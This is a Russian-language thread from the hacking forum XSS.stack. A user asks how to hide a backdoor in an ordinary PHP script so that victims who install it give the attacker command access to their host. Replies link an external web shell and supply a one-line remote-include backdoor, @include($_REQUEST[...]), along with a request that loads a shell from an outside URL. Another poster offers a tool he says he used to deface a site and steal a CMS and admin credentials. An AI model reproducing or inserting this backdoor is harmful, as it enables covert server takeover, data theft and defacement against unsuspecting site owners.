• XSS.stack #1 – первый литературный журнал от юзеров форума

Скрипт типа трояна

Shadow

RAID-массив
Пользователь
Регистрация
17.08.2006
Сообщения
59
Реакции
0
Я хотел спраситя мозно ли например в обыкновеный пхп скрипт вставитя такоы код 4тобы если жертва засунет етот скрипт себе на хост то хакер сможет 4ерез свой шелл выполныятя на нем команды? типа тоже самое 4то троян толяко по вебу :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Shadow
Это называеться баг в скрипте,посмотри на баготраках на наличие нужной тебе ошибки в нужном тебе скрипте
 
Нене я не хац4ыу например жертве в скрипте наыти баг а самому создатя скрипт а патом ыетот скрипт передатя жертве и управлятя ыего файлами на хостинге
 
называеться такие скрипты "веб шеллы"
http://kiborg.h10.ru/shell/sim.txt
дай ему это скрипт, и тогда ты сможешь как ты гришь "управлять файлами на серваке"
 
ну тогда возьми любой php скрипт и допиши в него
@include($_REQUEST[tikitak]);

при заходе на страницу ничего не будет, но еслить запросить страницу с index.php?tikitak=http://site.ru/shell.txt?
то подгрузиться твой шелл
 
Каро4е на сваём хосте попробывал работает а вот на удаленом нет :( но все равно спасибо за инфу мне вот такоы бы вариант каторый ты выложыл толяко робо4иы
 
Shadow, моя ася 7711773.

Стучись - скину.

Она небольшая, но вчера один сайт ей дефейснул =)
Единственный минус - она с Windows-1251 не в ладах, но файлы качать и заливать мона =)

Я этой штучкой уже одну самопальную CMS с одного сайта спер - включая логин и пароль админа :)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх